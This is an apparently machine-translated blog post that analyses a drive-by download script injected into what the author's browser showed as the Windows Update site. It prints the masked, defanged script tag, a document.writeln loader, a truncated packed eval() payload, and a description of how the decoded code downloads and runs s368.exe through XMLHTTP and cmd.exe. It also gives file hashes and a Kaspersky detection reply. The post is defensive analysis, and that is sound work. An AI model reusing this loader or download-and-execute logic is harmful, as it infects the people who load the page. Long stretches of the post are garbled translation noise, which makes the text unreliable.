Is the Windows Update Website hacked or hacked by the ARP virus? Virus. win32.autorun. AM

Is the Windows Update Website hacked or hacked by the ARP virus? Virus. win32.autorun. AM

EndurerOriginal
1Version

When I turned on my computer this morning, I found that Windows Update was slow, so I opened http://www.windowsupdate.com/manually, but it was a pile of garbage ~

Select "Windows Update" from the Start menu and open http://windowsupdate.microsoft.com/. the display is the same as http://www.windowsupdate.com.

Check the IP address.

D:/PE/test> Ping www.windowsupdate.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.225.221:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms

[Query results] Your query: [IP address] 207.46.225.221 => 207.46.225.221
· Main data on this site: Microsoft, Raymond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
[Query] www.123cha.com

D:/PE/test> Ping windowsupdate.microsoft.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.18.94:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms

[Query results] Your query: [IP address] 207.46.18.94 => 207.46.18.94
· Main data on this site: Microsoft, Raymond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA

The IP address is normal.

View the webpage Source Code as follows:
/---
<SCRIPT src = hxxp: // C *** K ** 1 *. In/n **. js> </SCRIPT> merge Mo ?? & Apos; snapshot} t used [when lo has been transferred? H W ま щ H, 6}/g? Q | y (? = {Symbol # rk suo Q drive n # MX) symbol 5 symbol FP symbol E?
? When there are too many R groups )??
? Why are there too many? Xu/= Z ^ + y C ^ Z ^ @ k? G Branch algorithm G.3? P [F? L? Mongoj mon
? K ^? Why Z V ?? DM
? Zc2iglg ^ B $ zookeeper DCS
Tianji baijw Marriott? H0; C don't g comment '? })? QG? Port w * bandwidth = 4 pockets? 0 bytes? 6 then V? Mai? Why? O> n? Why? Ha ready R ready? = Birds x birds '0 birds ~ Why? Success !? F done! PJ ^ [? @:? K branch 22 Dispatch n, cen h Branch (r Association Zhejiang
#? | Listen 8j?] 6 bytes running % N? V? Policyp? J? W <th! P? {Token ;? Jing 2 P length "% F ~ Teng ?) # €? Why S & minutes = Why? EI should t be | T should have been too many O should have been too many 'xw? + Ding Yi? Isn t ?,] P] '{h # {o :? Too many? What is auto scaling? Too many tasks? G? F'l lambs? When 6 then y * then *? 20174lr ?? G Baking> K? A branch P branch-branch m
?
Giggle? Uzt ^ Zn rjfv: J %7 %9 ?! Stuffy? Wannacase? H1? When when 1 then 2 then? & Y? M limit l limit !? Jane D (; Zhu 'Shen; € K )_?
Go into Objective C? Too many I/too 5 then too W? Pray. R? [? R [4 m Habitat D? V ?」 Qingting #1 Juan jiu jb? Required bytes} required 4O;
Ann; X ironed r He = K U cut? =? Shouu shouyu) Sang Ming H Yu t he #? @? Success | .? When a halogen D is r? "n? Why? # K shot ?, 7 F] rows/Z. _ rows ,? Too many's? ) When I did * When does it happen? N?
Why 9 then why @ s? F? L zookeeper ~? 8? Zookeeper (? Why? 66? T /? Shard = | shard? ^ ?? Z runtime BM] Does O. 0? K ▆ @ v ?? + 8 {
U? S (?
Why ?? |? Too many tasks? 4hd audio? SN spring CW [| ?? Why 7 then? I'm C :?? Blunt margin {P packet loss margin; proper margin R ['margin ?} Leopard e-oak t? U branch networks
9u too long?
H? HP frequency compaction encounters compaction <G? Why? 7n?
---/

D:/test> Ping C *** K ** 1 *. In

Pinging C *** K ** 1 *. In [209.11.243.35] with 32 bytes of data:

Reply from 209.11.243.35: bytes = 32 time = 479 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 411 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 375 Ms TTL = 116
Request timed out.

Ping statistics for 209.11.243.35:
Packets: Sent = 4, stored ED = 3, lost = 1 (25% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 375 ms, maximum = 479 ms, average = 316 ms

Your query: [IP address] 209.11.243.35 => 209.11.243.35
· Main site data: USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: USA
· Reference Data 2: USA

Hxxp: // C *** K ** 1 *. In/n **. jsSource code:
/---
Document. writeln ("<SCRIPT src =/" hxxp: /// C *** K ** 1 * // s368 // newjs *** 2.js/ "> <// SCRIPT> ");
Document. writeln ("<SCRIPT> ");
Document. writeln ("function start (){");
Document. writeln ("Var then = new date ()");
Document. writeln ("then. settime (then. gettime () + 24*60*60*1000 )");
Document. writeln ("Var cookiestring = new string (document. Cookie )");
Document. writeln ("Var cookieheader =/" cookie1 = /"");
Document. writeln ("Var beginposition = cookiestring. indexof (cookieheader )");
Document. writeln ("If (beginposition! =-1 ){");
Document. writeln ("} else ");
Document. writeln ("{document. Cookie =/" cookie1 = popw.s; expires =/"+ then. togmtstring ()");
Document. writeln ("");
Document. writeln ("}");
Document. writeln ("}");
Document. writeln ("START ();");
Document. writeln ("</SCRIPT> ")
---/

Hxxp: // C *** K ** 1 *. In/s368/newjs *** 2.jsIs to use eval () to execute the encryption code:
/---
Eval (function (P, A, C, K, E, D) {e = function (c) {return (C <? '': E (parseint (C/A) + (C = C % A)> 35? String. fromcharcode (C + 29): C. tostring (36)}; If (! ''. Replace (/^/, string) {While (c --) d [E (c)] = K [c] | E (C ); k = [function (e) {return d [e]}]; E = function () {return '// W +'}; C = 1 }; while (c --) if (K [c]) P = P. replace (New Regexp ('// B' + E (c) + '// B', 'G'), K [c]); return p} ('1a ("// I // G // E // H // J // 2... (Omitted )... | X2a | eval'. Split ('|'), 0 ,{}))
---/

The original code is obtained after three decryption. Microsoft. XMLHTTP and SCR using pting. FileSystemObject are used to download the s368.exe file and save it to % WINDIR %. The file name is defined by the UDF:

/---
Function gnms (N)
{
VaR numberms = math. Random () * N;
Return '~ Temp '+ math. Round (numberms) +'. tmp ';
---/

Generate, that is ~ Temp *****. EXE, where ***** is a number. Then run the command % WINDIR %/system32/cmd.exe/C % WINDIR %/~ through the ShellExecute method of the shell. Application Object Q /~ Run temp *****. EXE.

File description:D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 8:39:29
Modification time: 8:39:29
Access time:
Size: 23087 bytes, 22.559 KB
MD5: a0795ad6df991d65b38968ced427f09b
Exestealth 2.0-2.4-> webtoolmaster

Subject:	Re: s368.exe [KLAB-2419187]
Sender:	"" <Newvirus@kaspersky.com>	Sent at: 13:58:48

S368.exey-Virus. win32.autorun. AM

New malicious software was found in this file. It's detection will be added in the next update. Thank you for your help.

Please quote all when answering.
--
Best regards, Boris Yampolsky

Virus analyst, Kaspersky Lab.

E-mail: newvirus@kaspersky.com

Http://www.kaspersky.com/

Http://www.kaspersky.com/virusscanner-free online virus testing.

Http://www.kaspersky.com/helpdesk.html-technical support.

I downloaded the check again and found that the MD5 value of the file has changed:

File description:D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 19:43:49
Modification time: 19:43:50
Access time:
Size: 23087 bytes, 22.559 KB
MD5: e277b83f3eedac59ec0077bb981e4082